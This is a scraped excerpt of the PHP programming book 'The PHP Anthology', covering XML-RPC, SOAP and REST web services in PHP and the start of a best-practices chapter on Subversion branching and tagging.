'21343243346 * 989554365486 = ' . $mult; }
  • 438. 414 The PHP Anthology catch (Zend_XmlRpc_Client_FaultException $e) { echo $e->getMessage(); } We first instantiate the Zend_XmlRpc_Client object with the URL of the web service. The URL I've used above is relevant only to our testing environment so be sure to change it to an appropriate alternative if you’re testing this script. The Zend_XmlRpc_Client then allows us to call the web service directly as if it were a PHP method, for example, $proxy->math->add. It’s really that easy; the Zend_XmlRpc_Client and its namespace proxy make calling XML-RPC methods as simple as calling object methods.12 We pass native PHP values as method arguments, and get PHP values back. What could be easier? PHP’s Native XML-RPC Extension If you don’t want to install Zend Framework, what other options do you have? PHP has a native XML-RPC extension, ext/xmlrpc, that can either be compiled using the --with-xmlrpc directive, or installed via PECL. It’s marked as experiment­ al, so using it in a production environment may be risky, though it has been available since the early PHP 4 series. It provides functions for encoding and decoding XML­ RPC values, creating XML-RPC requests and responses, and binding an XML-RPC server to PHP callbacks. A basic request uses the xmlrpc_encode_request function: $request = xmlrpc_encode_request($methodName, $valuesArray); Here, $methodName is the XML-RPC method being requested, and $valuesArray is an array of values that are to be passed as arguments to the request. If you need to specify an XML encoding, you can pass an optional third value—an associative ar­ ray—with some options: 12 http://framework.zend.com/manual/en/zend.xmlrpc.html
  • 439. XML and Web Services 415 $request = xmlrpc_encode_request( $methodName, $valuesArray, array('encoding' => 'UTF-8') ); The returned $request is the XML that we can use to make the request. Note that some XML-RPC types don’t have direct equivalents in PHP; to use these, you’ll need to tell ext/xmlrpc how they should be encoded using the xmlrpc_set_type function. These values can then be passed directly to the xmlrpc_encode_request function: $date = xmlrpc_set_type('2006-12-01', 'datetime'); $base64 = xmlrpc_set_type($base64EncodedData, 'base64'); $request = xmlrpc_encode_request( $methodName, array($date, $base64, $assocArray), array('encoding' => 'UTF-8') ); As an example, here’s a simple XML-RPC client script that uses ext/xmlrpc and the XML-RPC server we saw in “How do I serve my own XML-RPC web services?”: ext_xmlrpc_client.php (excerpt) try { $request = xmlrpc_encode_request( 'math.add', array(array(1,2)), array('encoding' => 'UTF-8') ); $context = stream_context_create(array('http' => array( 'method' => "POST", 'header' => "Content-Type: text/xml", 'content' => $request ))); $file = file_get_contents( 'http://localhost/phpant2/chapter_12/examples/' . 'zend_xmlrpc_serv.php', false, $context); if(!file) {
  • 440. 416 The PHP Anthology throw new Exception('Unable to get response from web service'); } $response = xmlrpc_decode($file); if (is_array($response) && xmlrpc_is_fault($response)) { throw new Exception($response['faultString'], $response['faultCode']); } echo '1 + 2 = ' . $response; } catch (Exception $e) { echo $e->getMessage(); } PHP’s ext/xmlrpc extension does most of the work to abstract the basic XML-RPC functionality of encoding and decoding values and requests and responses. However, you have to create the actual data exchange transfer yourself, as we did above with the file_get_contents function. This approach offers nothing near the simplicity of Zend_XmlRpc_Client unless, for example, you write your own class wrapper around it. How do I serve my own XML-RPC web services? XML-RPC servers listen at a specified address for HTTP POST requests, and return XML in the response content using the text/xml Content-Type header. Errors are reported using an XML-RPC fault response, which is an XML struct response that contains faultCode and faultString elements. Let’s see what’s involved in the process of decoding incoming requests, dispatching them, and returning a valid response. Solution The Zend_XmlRpc_Server class allows you to bind classes or functions to the server with optional namespaces;13 it then uses the Reflection API, and the developer­ 13 http://framework.zend.com/manual/en/zend.xmlrpc.html
  • 441. XML and Web Services 417 created phpDocumentor docblocks describing the functions or class methods,14 to determine the XML-RPC prototypes. The caveat to using this approach is that you must use XML-RPC types in your docblocks to describe your parameters and return values. Zend_XmlRpc_Server, like all server classes in the Zend Framework, follows PHP’s SoapServer API, which makes the interface consistent across the different protocol implementations. As an example, here’s a simple Math class with two methods, add and multiply, for which we can build a server: Math.class.php (excerpt) /** * Math methods */ class Math { /** * Return the sum of all values in an array * * @param array $values An array of values to sum * @return int */ public static function add($values) { return array_sum($values); } /** * Return the product of all values in an array * * @param array $values An array of values to multiply * @return int */ public static function multiply($values) { return array_product($values); } } 14 http://www.phpdoc.org/
  • 442. 418 The PHP Anthology Now, let’s build the XML-RPC server, and for good measure, let’s also create a function for retrieving XML-RPC server information: zend_xmlrpc_serv.php (excerpt) require_once 'Zend/XmlRpc/Server.php'; require_once 'Math.class.php'; /** * Get some info from the server * * @return struct */ function getInfo() { return array( 'publisher' => 'SitePoint', 'title' => 'The PHP Anthology' ); } $server = new Zend_XmlRpc_Server(); // Math class methods will be available in the 'math' namespace $server->setClass('Math', 'math'); // getInfo() function will be available as server.getInfo $server->addFunction('getInfo', 'server'); // Handle a request echo $server->handle(); The Zend_XmlRpc_Server instance in this example will make three methods avail­ able, math.add, math.multiply, and server.getInfo, in addition to several system methods that we can use to obtain information about the server. It will automatically check incoming requests to make sure they adhere to the various method signatures, throwing fault responses if they do not, and return the XML-RPC response along with any required headers. You don’t need to change your code to conform to the server class requirements; the server conforms to your code. You will need to write phpDocumentor docblocks for each method or function you’ll be serving, and ensure they contain @param and @return tags; the server uses these to create the method signatures, and compares the types and numbers of incoming parameters with those signatures to ensure the incoming request conforms to the definition. Additionally, the types specified with these tags should conform to XML­
  • 443. XML and Web Services 419 RPC type definitions; for example, use struct for associative arrays, date- Time.iso8601 for dates, and so on. PHP’s Native XML-RPC Extension Serving XML-RPC with Zend_XmlRpc_Server is as easy as serving SOAP requests in PHP 5; simply register a class or function with the server, and handle it. But be­ sides Zend_XmlRpc_Server, what options do we have? ext/xmlrpc can be used to build XML-RPC servers, too. We simply create an XML­ RPC server using xmlrpc_server_create, register callbacks to XML-RPC method names, grab the request, handle it, and send the response back. As an example, let’s try to serve the following method and function: ext_xmlrpc_serv.php (excerpt) /** * Math methods */ class Math { /** * Return the sum of all values in an array * * @param array $values An array of values to sum * @return int */ public static function add($method, $params) { return array_sum($params[0]); } } /** * Return the product of some values * * @param string $method The XML-RPC method name called * @param array $params Array of parameters from the request * @return int */ function product($method, $params) { return array_product($params); }
  • 444. 420 The PHP Anthology Now that we’ve created these definitions, we’ll register them with the XML-RPC server: ext_xmlrpc_serv.php (excerpt) $server = xmlrpc_server_create(); xmlrpc_server_register_method($server, 'math.add', array('Math', 'add')); xmlrpc_server_register_method($server, 'product', 'product'); Now we need to grab the request, dispatch it, and return a response: ext_xmlrpc_serv.php (excerpt) $request = file_get_contents('php://input'); $response = xmlrpc_server_call_method($server, $request, null); header('Content-Type: text/xml'); echo $response; If you examine this example closely, you’ll notice that functions and method calls have to follow a particular signature; specifically, they can only accept two argu­ ments: the requested $method and the requested $params. This means that if you want to create an XML-RPC server using ext/xmlrpc, you must either write all your method handlers to conform to this specification, write wrappers for your existing methods, or write a dispatcher to dispatch method calls using the original parameter order—all of which activities are beyond the scope of this discussion. The easier approach is to use an XML-RPC server that creates this magic for you. PEAR’s XML_RPC2 and Zend_XmlRpc are two such implementations. Zend_XmlRpc makes XML-RPC a first-class OOP citizen, simplifying the process of making requests and serving responses, and allowing any function or class method to be used as a server handler. How can I consume SOAP web services? SOAP, originally an acronym for Simple Object Access Protocol, but now simply a protocol name, is, to quote the specification, “a lightweight protocol intended for exchanging structured information in a decentralized, distributed environment.” SOAP provides tremendous flexibility and extensibility.
  • 445. XML and Web Services 421 Like the other protocols discussed in this section, SOAP uses XML to transfer messages between the client and server. The base message unit that’s transferred is an object. A server needs to specify the available methods and properties, and make that specification available to clients so that they can initiate requests. This specific­ ation is achieved using a WSDL, the Web Services Description Language, specifica­ tion. The SOAP and WSDL specifications are notoriously difficult to decipher. The gen­ eral consensus among developers is to use WSDL development tools to create the WSDL from your application classes, and to use clients and servers provided in your language to conduct the actual SOAP communication. Fortunately, PHP 5 has native SoapClient and SoapServer classes, and tools are emerging for generating the WSDL. The topic of consuming SOAP-based web services is incredibly broad and we couldn’t possibly cover it in any great detail in this book, but here’s a gentle intro­ duction. Solution Using the PHP 5 SoapClient class is incredibly easy: $client = new SoapClient($uriToWsdl, array('location' => $uriToSoapService)); $result = $client->SomeMethod($value1, $value2) There’s certainly much more to the SoapClient class, but that’s the basic usage: create a SoapClient instance by passing the URL to the WSDL specification, and the location of the SOAP service, as arguments to the SoapClient constructor, and start making calls. The SoapClient makes all the methods of the SOAP service available as PHP methods. What if you want to pull the results of a SOAP request into an object? No problem! You can easily map a SOAP response to a PHP class. Here’s a hypothetical example that uses a book information service. The SOAP service provides a getBookInfo method. If we pass it an $id value, it will return a response representing a book with author, title, date, and publisher properties. This response is defined in the web service’s WSDL file as the type Book. And if we already have an object for
  • 446. 422 The PHP Anthology a book in our PHP application (let’s call it MyBook), we can map the SOAP response type onto our own MyBook object. First, we define our MyBook class: class MyBook { public $author; public $title; public $date; public $publisher; } When we instantiate the SoapClient object, we add a classmap option that maps the WSDL Book type to our MyBook PHP class: $client = new SoapClient($uriToWsdl, array( 'location' => $uriToSoapService, 'classmap' => array('Book' => 'MyBook') )); Now, when we call the SOAP method that would normally return the SOAP object type, we receive an instance of our PHP class instead: $book = $client->GetBookInfo($id); // $book is a MyBook instance echo $book->title; When it binds a class to a SOAP response, SoapClient will set in the object any public properties for which it finds a match in the response. Because the returned object instance is a standard PHP object, you can also define methods for accessing or transforming the SOAP data in the class. Discussion Assuming that the remote service has a defined WSDL specification, making requests to SOAP services is tremendously easy in PHP 5. The flexibility to bind objects to responses can offer tremendous opportunities for working with remote data. If you’ve been afraid of SOAP before, yet you’re comfortable with OOP, there’s no need to be afraid any longer!
  • 447. XML and Web Services 423 How do I serve SOAP web services? You’ve dipped your toes in the SOAPy water by consuming some SOAP services in “How can I consume SOAP web services?”, and now you’re thinking that the next step is to create some of your own. You’ve got a number of classes that seem eligible; how can you expose their APIs publicly? Solution Serving SOAP is roughly as easy as the using the client: use SoapServer. The topic of creating SOAP-based web services is another broad area that we couldn’t possibly cover in any great detail in this book, but let’s get our bearings by looking a simple example. First, let’s define a class for a book with the original name of Book: class Book { public $author; public $title; public $date; public $publisher; /** * Constructor * * @param string $author * @param string $title * @param int $date * @param string $publisher * @return void public function __construct($author, $title, $date, $publisher) { $this->author = $author; $this->title = $title; $this->date = $date; $this->publisher = $publisher; } } With that out of the way, we can define an API for retrieving books with a class called BookService:
  • 448. 424 The PHP Anthology class BookService { /** * Retrieve book information and send * * @param int $id * @return Book */ public function GetBookInfo($id) { ⋮ perform some work and get some book details… $book = new Book($author, $title, $date, $publisher); return $book; } } Now let’s bind these classes to a SoapServer instance: $server = new SoapServer($uriToWsdl, array( 'encoding' => 'ISO-8859-1', 'actor' => $uriToSoapService, 'classmap' => array('Book' => 'Book') )); $server->setClass('BookService'); $server->handle(); That’s all there is to it; your BookService class’s GetBookInfo method is now ex- posed as a SOAP method, and will return Book instances to requests from SOAP clients. Discussion Serving SOAP has never been so easy as it is with PHP 5. But there’s one more aspect to consider: what about the WSDL specification? It’s possible to use SOAP between PHP servers without using WSDL, but this ap- proach is problematic, because it means that many of the features of the SOAP client, such as the auto-discovery of available methods, won’t work. It then becomes the responsibility of the service developer to communicate the available methods to those consuming the services. Although generating your own WDSL may be a daunting task, given the complexity of the specification, many IDEs have tools for generating WSDL specifications based on the introspection of your classes. Another
  • 449. XML and Web Services 425 choice for generating WSDL specifications, and a newcomer on the scene, is Zend_Soap, from the Zend Framework.15 This component contains the Zend_Soap_AutoDiscover class, which will generate a WSDL specification from a class using PHP’s own Reflection API. Here’s an example: $generator = new Zend_Soap_AutoDiscover('BookService'); $wsdl = $generator->handle(); From here, you can cache the generated WSDL specification, contained in the $wsdl variable, in a web-accessible location, then start to create servers and clients for it using SoapServer and SoapClient. How can I consume REST services? REST, or Representational State Transfer, is a newcomer on the web services scene, and has gained considerable popularity in the past few years. The ideas behind this architectural approach are simple: application state and functionality are separated into resources that can be addressed with a unique identifier, all resources share a consistent interface and standardized content types. As it happens, the Web is a great example of this style of application architecture. We can use the URL as the unique identifier for resources and the HTTP protocol as the consistent interface through which we access the resources. Finally, resources are represented by standardized content types—XML, HTML, and so on.16 As an example, let’s consider a hypothetical REST service for books: ■ A GET request to http://example.com/books uses XML to return a list of books. ■ A POST request that contains XML book data and is made to the same URL will add a new book to the service. ■ Retrieving the XML for an individual book involves making an HTTP GET request to a slightly different URL that specifies a particular resource, such as http://example.com/books/php-anthology. 15 http://framework.zend.com/manual/en/zend.soap.html 16 A more detailed explanation can be found on Wikipedia, at http://en.wikipedia.org/wiki/Representational_State_Transfer.
  • 450. 426 The PHP Anthology ■ Editing the book involves sending XML book data via an HTTP PUT request to the same URL. ■ Sending an HTTP DELETE request to the URL would delete the resource. Such a service would be considered RESTful, that is, it would follow the principles of REST. Each resource has a unique identifier, its URL, and each resource has a consistent interface, HTTP, through which the request type describes the type of action being requested. Basically, REST makes use of the technology of the Web, unlike XMLRPC or SOAP, which use the Web simply as a means for sending commands. For example, in our REST API above, sending a GET request to http://example.com/books/php-anthology returns the XML representation of the book. If the book doesn’t exist, the service responds with a standard HTTP 404 Not Found response. In contrast, using an XMLRPC interface to the same service might require you open a connection to the service and make a method call to a getBook method, passing the book’s identifying code, php-anthology, as an argument. If the book didn’t exist, the service would respond with an error message. The main difference between these two approaches is the use of HTTP to represent the intended action—GETting a book—and the meaningful URL that represents the book itself. In real-world circumstances, many browsers and HTTP clients still don’t implement PUT and DELETE, so all resource update and delete operations are completed via POST requests that use additional request parameters to represent the operation de­ sired. While not entirely RESTful, the practice is widespread enough to be considered the standard approach. Modern REST services that use XML are common. Some REST services provide XML schemas so that consumers can easily determine how to get at the data they need or format their requests, while others simply provide API documentation. Solution By now, you should be well on your way to being able to handle any XML that’s thrown at you. We can use SimpleXML to parse REST responses, and SimpleXML, DOM, or XMLWriter to create requests (if a data payload is needed).
  • 451. XML and Web Services 427 To use a specific REST service, you’ll need to obtain its API documentation, but for the purposes of this example, let’s use the hypothetical REST service for books we defined above. Let’s assume that the URL http://example.com/books, when called via an HTTP GET request, returns the following XML list of books: <?xml version="1.0" encoding="UTF-8"?> <books> <book id="php-anthology">PHP Anthology</book> <book id="css-anthology">CSS Anthology</book> </books> In our book service, the id attribute of each book can be used to retrieve the book’s details. Here’s an example of the XML returned by a GET request to http://example.com/books/php-anthology: <?xml version="1.0" encoding="UTF-8"?> <book> <id>php-anthology</id> <title>PHP Anthology</title> <publisher>SitePoint Pty., Ltd.</publisher> <chapterCount>14</chapterCount> <edition>2</edition> <pubDate>2007</pubDate> </book> To retrieve and process this information, we might use a hypothetical client script that uses SimpleXML, like this: $books = new SimpleXMLElement('http://example.com/books', null, true); $ids = array(); foreach ($books as $book) { $ids[] = $book['id']; } foreach ($ids as $id) { $book = new SimpleXMLElement( 'http://example.com/books/' . $id, null, true
  • 452. 428 The PHP Anthology ); echo $book->title, ', published by: ', $book->publisher, "n"; } For XML-based REST services, we can employ SimpleXML to do the heavy lifting of making the request, receiving the response, and parsing it. In the example above, we retrieve the books list by instantiating a new SimpleXMLElement object, passing the URL as the first argument. If the first argument to the constructor is a URL, the third argument must be true. We grab the id attribute values of all books, and use them to make new requests to obtain the XML data for each book. We then grab each book’s title and publisher in order to display the list. How would you create a new book using this service? Most services would have you POST a book definition to the base URL, and in our example, that approach might look like this: $book = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8"?><book></book>'); $book->addChild('title', 'Life, the Universe, and Everything'); $book->addChild('publisher', 'Del Rey'); $book->addChild('chapterCount', 42); $book->addChild('edition', '26 April 2005'); $book->addChild('pubDate', '2005'); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $book->asXML() )); $context = stream_context_create($opts); $response = file_get_contents('http://example.com/books', false, $context); The task of editing a particular resource would be similar to that of adding a new document. However, the URL we’ll use will be the resource’s unique URL, and in­ stead of sending the entire book definition, we’ll need to send only the data that’s changing: $book = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8"?><book></book>'); $book->addChild('chapterCount', 21);
  • 453. XML and Web Services 429 $book->addChild('edition', 'Del Rey 2005'); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $book->asXML() )); $context = stream_context_create($opts); $response = file_get_contents( 'http://example.com/books/php-anthology', false, $context); Maybe we want to delete the book from the list—how would we accomplish this? So far, we’ve distinguished between adding and updating resources by changing the URL. A proper RESTful web service would have us send an HTTP DELETE request to the book’s unique URL, but since not all HTTP clients can generate DELETE re­ quests, our web service does the next best thing: it requires users to POST a delete element with a value of 1: $book = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8"?><book></book>'); $book->addChild('delete', 1); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $book->asXML() )); $context = stream_context_create($opts); $response = file_get_contents( 'http://example.com/books/php-anthology', false, $context); The example above is a bit contrived, but it’s not far off the mark. A client makes simple HTTP GET requests to resources, and decides what to do with the responses, or POSTs XML to the service in order to add, update, or delete resources. SimpleXML is the staple resource for consuming and generating requests, and PHP’s own streams layer makes POSTing requests a breeze. In a real REST service, you’ll need to examine the API carefully to determine which URLs are available, what XML they return, and what XML they expect for operations that affect data in the service. REST is loosely defined, so each time you want to interact directly with a new REST service, you’ll need to do a bit of learning.
  • 454. 430 The PHP Anthology Using the Zend Framework Another possible approach to consuming a REST service is to use Zend Framework’s 17 Zend_Rest_Client component. This client expects that the REST server it contacts is using XML for the transaction, which should be a safe assumption. After perform­ ing the request, we access the response using object properties, which eliminates the need to perform type casting as we must with SimpleXML. Technorati’s bloginfo API requires you to make a GET request to the following URL:18 http://api.technorati.com/bloginfo?key=apikey&url=blog url The URL requires two arguments to appear in the query string: your API key and the blog’s URL. You can get your own API key from the Technorati web site at http://technorati.com/developers/apikey.html. The above URL will return the following XML: <?xml version="1.0" encoding="utf-8"?> <!-- generator="Technorati API version 1.0 /bloginfo" --> <!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN" "http://api.technorati.com/dtd/tapi-002.xml"> <tapi version="1.0"> <document> <result> <url>URL</url> <weblog> <name>blog name</name> <url>blog URL</url> <rssurl>blog RSS URL</rssurl> <atomurl>blog Atom URL</atomurl> <inboundblogs>inbound blogs</inboundblogs> <inboundlinks>inbound links</inboundlinks> <lastupdate>date blog last updated</lastupdate> <rank>blog ranking</rank> <lang></lang> <foafurl>blog foaf URL</foafurl> </weblog> 17 http://framework.zend.com/manual/en/zend.rest.html 18 http://technorati.com/developers/api/bloginfo.html
  • 455. XML and Web Services 431 <inboundblogs>inbound blogs</inboundblogs> <inboundlinks>inbound links</inboundlinks> </result> </document> </tapi> As an example, you could use the following approach to use Technorati’s bloginfo service: zend_rest_technorati.php (excerpt) require_once 'ZendRestclient.php'; $key = apikey; // Technorati requires an API key $technorati = new Zend_Rest_Client( 'http://api.technorati.com/bloginfo'); $technorati->key($key); $technorati->url('http://sitepoint.com'); $result = $technorati->get(); echo $result->weblog->name . ' (rank: '. $result->weblog->rank . ')'; This code would return: SitePoint : New Articles, Fresh Thinking for Web Developers and ➥ Designers (rank: 196) How can I serve REST services? You’re jumping on the REST bandwagon. Your boss is convinced that this is the big new trend in web services, and wants something out the door today. What do you need to do? Solution Honestly, all you need to do is: ■ Create URLs or a URL schema that can map to your resources. ■ Create XML for your responses. You need to determine which resources you’ll make available, and then come up with a URL schema to cover them. In this example, let’s use books as the resource
  • 456. 432 The PHP Anthology we want to make available. Perhaps you need services that allow you to list the book resources, detail a single book at a time, and allow users to post information about new books and edit that for existing books. A RESTful URL schema might look like this: ■ retrieve list of books: http://example.com/books ■ retrieve single book: http://example.com/books/book-name To add a book, you would POST to the first URL; to update the details of an existing book, you would POST to the second. Next, you need to create a script to handle the incoming requests. Make sure you have a look at “How do I make “pretty” URLs in PHP?” in Chapter 5—there, you’ll find a complete solution for creating a URL schema with the Apache web server and a request handling class. Here’s a simple example script to handle our book requests: $path = explode(‘/’, trim($_SERVER[‘PATH_INFO’], ‘/’)); if ((1 == count($path)) && (‘books’ == $path[0])) { if (‘post’ == strtolower($_SERVER[‘REQUEST_METHOD’])) { ⋮ new book entry } else { ⋮ list books } } elseif ((2 == count($path)) && (‘books’ == $path[0])) { if (‘post’ == strtolower($_SERVER[‘REQUEST_METHOD’])) { ⋮ edit book entry } else { ⋮ retrieve book entry } } This script starts by exploding the path information of the incoming request into an array, and trimming the trailing / character. It then tests how many elements are
  • 457. XML and Web Services 433 generated, and whether the first element is books. If only one element is present, books, the script checks the request method. If it’s a POST request, the code takes the branch to creating a new book; if it’s a GET request, the code takes the branch to listing all the books. If two elements are present, the script assumes that the second element is the book name. In this case, a POST request represents an update to the specific book and a GET request will display the named book. For the book list and named-book information requests, simply generate or fetch the XML to return to the user. In the case of new entries or updated entries, you’ll need to retrieve and parse the incoming XML first. To retrieve the incoming XML, grab it from the raw POST request like this: $post = fopen('php://input', 'r'); $xml = fread($post); fclose($post); Once you have the XML, you can parse and act on it as necessary. Discussion REST services allow us either to create the XML ahead of time, or to generate it on the fly using PHP as I’ve described elsewhere in this chapter. I highly recommend that you cache the responses, unless the request is allowed to change the data; one easy way to scale REST is by caching the service as static XML, because static content is usually served much faster than dynamic content by modern web servers. While REST services scale well and are relatively easy to implement, they do make the job more difficult for developers who want to use your services, since developers need to learn a new XML schema for every new REST service they consume. How­ ever, the simplicity of dealing with XML in PHP 5 makes this a moot point in most regards, and the combination of REST and SimpleXML makes for some very powerful web services, both on the client and server ends. Summary In this chapter, we’ve taken a quick tour of PHP 5’s various XML and web service extensions. We discussed the tasks of parsing and generating XML and using RSS
  • 458. 434 The PHP Anthology feeds, concluding that SimpleXML is PHP 5’s Swiss Army Knife for XML manipu­ lation, but also noting other important extensions such as SAX, XMLReader, XMLWriter, and DOM (on which SimpleXML is based). Searching XML via XPath, using both DOM and SimpleXML, was demonstrated, and the basic XPath syntax was covered. Most modern web services use XML for their payloads. XML-RPC uses XML for type hinting values passed in a request and returned in a response; with modern XML-RPC libraries such as Zend_XmlRpc, XML-RPC services can be called as PHP object methods transparently. SOAP defines an object as the unit of transport, and PHP 5’s SoapServer and SoapClient classes make creating and consuming SOAP services trivial. Finally, we discussed REST and RESTful web services, using Sim­ pleXML to generate and consume REST resources.
  • 459. 13 Chapter Best Practices The fact that PHP has an incredibly low barrier to entry represents both its greatest strength and greatest weakness. To its merit, PHP allows the novice programmer to develop feature-rich applications without needing to learn even the rudiments of computer science. The downside, however, is that as PHP offers many ways to complete the same task, application code can quickly become unmaintainable. Many programmers in the PHP field are now recognizing the need to standardize and promote best practices. Some of these best practices are PHP specific, such as the usage of tools like phpDocumentor for consistent documentation,1 or testing suites such as SimpleTest2 and PHPUnit.3 Other practices that are being promoted in the PHP community are more generic—the use of revision control systems and code deployment practices, for example. Regardless, if you follow all of them, these practices will make your life—and the lives of those who may later maintain your code—much easier. 1 http://www.phpdoc.org/ 2 http://simpletest.org/ 3 http://www.phpunit.de/
  • 460. 436 The PHP Anthology How do I track revisions to my project’s code? Picture this sad scene: your site is on the verge of being launched, and you’ve intro­ duced some new code to the system at the eleventh hour only to find, to your chagrin, that other features are now broken. You now have less than an hour to fix the problem. You need to undo your changes. But how on earth do you do that? We can only hope you’re using some form of revision control software (RCS).4 Re­ vision control software allows users to track changes to documents, code, and other files, and offers features to allow the merging of changes from multiple users, and the management of different versions of your code. Think of RCS as both a backup repository for your code, and a record of all the changes it undergoes for the duration of a project. Solution My preferred RCS is Subversion, and this software will be used in all the examples throughout this chapter.5 So you need to undo your changes fast? If you haven’t already committed your changes, you can roll them back easily with the following command: $ svn up -r BASE filename If you’ve already committed your changes, the following command will undo them: $ svn revert filename This command will revert your code to the previous version: $ svn up -r PREV filename 4 See the Wikipedia Version Control entry for a summary of revision control and a comparison of revision control systems: http://en.wikipedia.org/wiki/Version_control. 5 Visit the Subversion project web site at http://subversion.tigris.org/ for complete documentation. O’Reilly Media has published its book, Version Control with Subversion, online at http://svnbook.red-bean.com/
  • 461. Best Practices 437 Discussion A variety of versioning solutions is available, but they can be grouped into two major categories: distributed and non-distributed systems. In distributed systems, each user maintains his or her own repository, and the software typically tracks only changesets—software patches representing changes to the files under version control. Developers then share the changesets with one another, usually maintaining one canonical repository with all the changesets that have been accepted into the project. In non-distributed systems, a repository resides on a central server. Developers in­ dividually check out the repository to their own working directories, and check in their changes as they’re completed. Both systems have their benefits and downsides. However, non-distributed systems are more commonly used in PHP projects, so they’re the type you’ll most likely run into. Having a central repository allows you to designate a single location for the canonical version of the software you’re developing. You can easily tie in processes to run pre- and post-commit, perhaps performing unit tests, compiling documenta­ tion, or sending commit notifications to a distribution list. As I mentioned, many revision control systems are available, in both proprietary and open source forms. The most popular open source packages, and arguably the most popular revision control systems, are Concurrent Versioning System (CVS) and Subversion (SVN). The popularity of the two is, in large part, due to their open source nature; users obtain the tools for free, and can develop their own tools around these without needing to worry about license infringement. Additionally, no propri­ etary clients are necessary in order to work with these tools. CVS is the grandfather of non-distributed systems, and is the chosen revision control software for high-profile projects such as PHP itself and the PEAR project. Subversion is an evolution of CVS, and offers easier syntax for renaming files and directories in a repository, committing entire directory trees, and branching and tagging. This software is used in many modern frameworks, such as eZ Components and the Zend Framework. I personally recommend the use of Subversion for any new PHP projects, as its ease of setup, simple processes for creating pre- and post-commit hook scripts, and in­
  • 462. 438 The PHP Anthology tegration with other tool sets (IDEs and bug-tracking software, for example), are unparalleled among RCNs. Another advantage of Subversion is that the entire tree is versioned—individual files don’t receive their own versions. This feature allows you to make changes to multiple files as a distinct change set. When checking in your code, you can check in a complete change—unit tests, code, and documenta­ tion—all in one go. This style of versioning makes it easier later when you need to look through the log files to determine what changed and when, and which files were affected. How can I maintain multiple versions of a single codebase? Your project has just had a successful release, and now you need to support that release. However, you’ve been hard at work and already have new changes you want to introduce for the next release. How can you maintain both code bases, and ensure important fixes in one are ported to the other? Alternatively, perhaps you need to be able to continue development of your web site’s code base, but have a stable, production version of it running as well. How can you keep the two versions separate? Solution Branching and tagging are features common to RCS, allowing you to maintain sep­ arate branches of code in your repository. A branch is a separate version of the software that exists independently from other versions and maintains its own history. A tag is a named snapshot of the project at a given point in time. A typical repository layout should look something like this: project/ branches/ tags/ trunk/ We create a branch for each release like so:
  • 463. Best Practices 439 project/ branches/ release-1.0.0/ release-1.1.0/ The use of Subversion allows this task to be completed very easily: $ svn copy trunk branches/release-1.1.0 -m '1.1.0 release branch' Later, if you need to create a point release—a minor version, especially one intended to fix bugs rather than add new features—you can create an appropriate tag: $ svn copy branches/release-1.0.0 ➥ tags/release-1.0.1 -m '1.0.1 bugfix release' Similarly, you can create a branch for a production version of a site: project/ branches/ production/ tags/ trunk/ When you’re ready to deploy a software release, create a tag with a name that de­ scribes the changes: $ svn copy branches/production tags/2006-09-19-PirateDayJargon ➥ -m 'Pirate Day Jargon version of site for Pirate Day' Discussion In most cases, day-to-day development will occur in the repository trunk. When you’re ready to create a software release, create a branch. From this point forward, changes in the trunk will not affect code in the release branch—unless you merge them manually. Branches provide code separation, which helps you to prevent new features or backward compatibility breaks from creeping into released code. You can also selectively merge bug fixes or new features from one branch to another using your version control system’s merging capabilities. Here’s how the merge command would be used in Subversion, for instance:
  • 464. 440 The PHP Anthology $ svn merge ➥ -r 123:145 trunk/filename branches/release-1.0.0/filename However, an actual release needs to be static—that is, active development must have stopped—and we achieve this with tagging. In Subversion, tags and branches are created in the same way—via the “copy” oper­ ation. The only difference between them lies in the conventions that surround their use. Branches should indicate ongoing development, such as bug fixes, new features, and the like; tags should be considered static snapshots. One aspect to note is that in Subversion, copies are achieved using hard links, and not actual file copies; new files are only created when a new version is checked in against the copy. This means that copies are cheap, so you can—and should—branch and tag often. “Wait!" you say. “I’m not developing software—I’m developing a web site! How does this apply to me?” Easy now; you still need to be able to keep your development and production versions of the site separate, and your tags should represent points at which you launch bug fixes or new features on the site: project/ branches/ production/ tags/ 2006-09-19-PirateDayJargon/ 2006-05-11-LifeUniverseEverything/ 2006-04-01-AprilFools/ trunk/ On a day-to-day basis, you work in the repository trunk. As you finish features or bug fixes, you merge them into the production branch. You then preview this branch on your staging server, which is almost identical to the production server—it may even use the same data, pulled from the same web services. Once you’ve verified the changes, or your quality assurance team has reviewed the site and given its seal of approval, you create a tag. You can then export the project files from this tag:
  • 465. Best Practices 441 $ svn export ➥ http://example.com/svn/project/tags/2006-09-19-PirateDayJargon ➥ 2006-09-19-PirateDayJargon svn export grabs code from the repository and creates a local working copy without the versioning information (that is, the.svn subdirectories). This gives you a leaner, production-ready code tree to deploy. How can I write distributable code? When you’re working in a team, or writing code that will be released to the public, you need to keep several points in mind: ■ Code should be easily reused and extended. ■ Code should be easily readable. ■ Code files should be easily found in the file system. Common problems developers run into when they’re working on others’ code, or they’re using or extending third-party code, include: ■ difficulty extending code due to inflexible APIs (or lack of an API), or unclear inheritance (for example, how do you extend procedural code?) ■ naming collisions as a result of poor naming practices such as using common names when creating a class (for example, Mail) ■ difficulty reading other people’s code because of inconsistencies with indentation; variable, function, class, and file naming conventions; and code structure These are obviously separate problems, but all are related to the problem of failing to write distributable code. Solutions Distributable code is all about adopting good habits. There’s no single, bullet-proof solution to writing distributable code, but there are a few programming practices you should adopt. Turning them into programming habits will also mean that writing distributable code will take no extra effort at all. Let’s take a look at three 